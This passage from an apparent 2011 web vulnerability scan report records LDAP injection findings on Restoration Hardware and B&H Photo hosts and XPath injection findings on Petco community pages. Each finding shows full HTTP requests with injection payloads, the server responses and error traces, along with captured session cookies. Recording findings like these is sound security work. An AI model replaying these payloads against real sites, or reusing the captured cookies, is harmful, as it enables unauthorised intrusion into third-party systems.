Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3100a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pk0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5l0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:10 GMT







2.2. http://cimg-1.restorationhardware.com/cm [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cimg-1.restorationhardware.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 84d15caee2971e21)(sn=* and 84d15caee2971e21)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?tid=6&ci=84d15caee2971e21)(sn=*&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 84d15caee2971e21)(sn=*_login=1305510803016783924284d15caee2971e21)(sn=*; path=/
Set-Cookie: 84d15caee2971e21)(sn=*_reset=1305510803;path=/
Expires: Sun, 15 May 2011 07:53:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?tid=6&ci=84d15caee2971e21)!(sn=*&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 84d15caee2971e21)!(sn=*_login=1305510803015106202684d15caee2971e21)!(sn=*; path=/
Set-Cookie: 84d15caee2971e21)!(sn=*_reset=1305510803;path=/
Expires: Sun, 15 May 2011 07:53:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.3. http://server.bhphotovideo.com/cm [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://server.bhphotovideo.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 4f30a508a84f4dfe)(sn=* and 4f30a508a84f4dfe)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=4f30a508a84f4dfe)(sn=*&st=1305509945626&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305510778300&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305509951

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 4f30a508a84f4dfe)(sn=*_login=130551078001678392424f30a508a84f4dfe)(sn=*; path=/
Set-Cookie: 4f30a508a84f4dfe)(sn=*_reset=1305510780;path=/
Expires: Sun, 15 May 2011 07:53:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=4f30a508a84f4dfe)!(sn=*&st=1305509945626&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305510778300&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305509951

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 4f30a508a84f4dfe)!(sn=*_login=130551078001007303784f30a508a84f4dfe)!(sn=*; path=/
Set-Cookie: 4f30a508a84f4dfe)!(sn=*_reset=1305510780;path=/
Expires: Sun, 15 May 2011 07:53:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

3. XPath injection
There are 8 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


3.1. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Cat_Discussion_Forum/fd03p00v02d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget3&cdsn=476&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.2. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Dog_Discussion_Forum/fd03p00v01d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Dog_Discussion_Forum/fd03p00v01d1?widgetId=PTWidget2&cdsn=568&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.3. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Fish_Discussion_Forum/fd03p00v03d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget4&cdsn=873&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.4. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Reptile_Discussion_Forum/fd03p00v05d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Reptile_Discussion_Forum/fd03p00v05d1?widgetId=PTWidget7&cdsn=892&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.5. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1?widgetId=PTWidget5&cdsn=224&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.6. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Social_Applications_Polls/fd03p00v00apoll

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Social_Applications_Polls/fd03p00v00apoll?args=tid:LATEST;&widgetId=PTWidget1&cdsn=95&config=mspPolls0001'&pttv=2&includeCSS=false&nav=mspPolls HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.7. http://community.petco.com/n/blogs/blog.aspx [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /n/blogs/blog.aspx

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /n/blogs/blog.aspx?webtag=fd03p00v00b1&widgetId=PTWidget0&pttv=2&nav=widget&config=recentBlogPosts0001'&includeCSS=false&cdsn=282 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
